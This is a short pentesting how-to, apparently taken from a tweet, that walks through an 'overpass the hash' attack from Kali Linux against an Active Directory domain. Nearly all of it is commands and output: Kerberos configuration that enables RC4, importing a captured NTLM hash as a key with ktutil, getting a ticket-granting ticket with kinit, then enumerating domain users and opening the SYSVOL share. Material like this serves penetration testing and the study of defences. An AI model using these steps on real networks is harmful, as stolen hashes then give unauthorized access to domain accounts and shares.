Overpass Kerberos

Overpass the Hash with Kali

Source: https://twitter.com/passingthehash/status/737035748445171713

Make sure that `/etc/resolv.conf` points at the Domain Controller:

root@kali:~# cat /etc/resolv.conf

# Generated by NetworkManager
nameserver 10.0.0.1

Then set up your /etc/krb5.conf file (arcfour-hmac-md5 must be among the permitted enctypes, because the key imported below is an RC4-HMAC key):

[libdefaults]
 default_realm = EXPLOITS.COM
 default_tgs_enctypes = aes256-cts aes128-cts arcfour-hmac-md5 des-cbc-md5 des-cbc-crc
 default_tkt_enctypes = aes256-cts aes128-cts arcfour-hmac-md5 des-cbc-md5 des-cbc-crc
 permitted_enctypes = aes256-cts aes128-cts arcfour-hmac-md5 des-cbc-md5 des-cbc-crc
 dns_lookup_realm = true
 dns_lookup_kdc = true
 passwd_check_s_address = false
 noaddresses = true
 udp_preference_limit = 1
 ccache_type = 3
 kdc_timesync = 0
[domain_realm]
 dc1.exploits.com = EXPLOITS.COM
 .exploits.com = EXPLOITS.COM
 exploits.com = EXPLOITS.COM
[realms]
EXPLOITS.COM = {
 kdc = dc1.exploits.com:88
 master_kdc = dc1.exploits.com:88
 kpasswd = dc1.exploits.com:464
 kpasswd_server = dc1.exploits.com:464
}

And you are ready to create your keys:

root@kali:~# ktutil -k testkey add -p user1@EXPLOITS.COM -e arcfour-hmac-md5 -w 0c1f997a0830bbfb8167f49b1ed59d15 --hex -V 5

root@kali:~# kinit -t testkey user1@EXPLOITS.COM

root@kali:~# klist -v
Credentials cache: FILE:/tmp/krb5cc_0
        Principal: user1@EXPLOITS.COM
    Cache version: 4

Server: krbtgt@EXPLOITS.COM@EXPLOITS.COM
Client: user1@EXPLOITS.COM
Ticket etype: aes256-cts-hmac-sha1-96, kvno 2
Session key: arcfour-hmac-md5
Ticket length: 973
Auth time: May 29 17:34:06 2016
End time:  May 30 03:34:06 2016
Ticket flags: pre-authent, initial, forwardable
Addresses: addressless

root@kali:~# net rpc -k user -S dc1.exploits.com
Administrator
Guest
krbtgt
skip
user1
user3

root@kali:~# smbclient -k //dc1.exploits.com/sysvol
OS=[Windows Server 2008 R2 Enterprise 7601 Service Pack 1] Server=[Windows Server 2008 R2 Enterprise 6.1]
smb: \>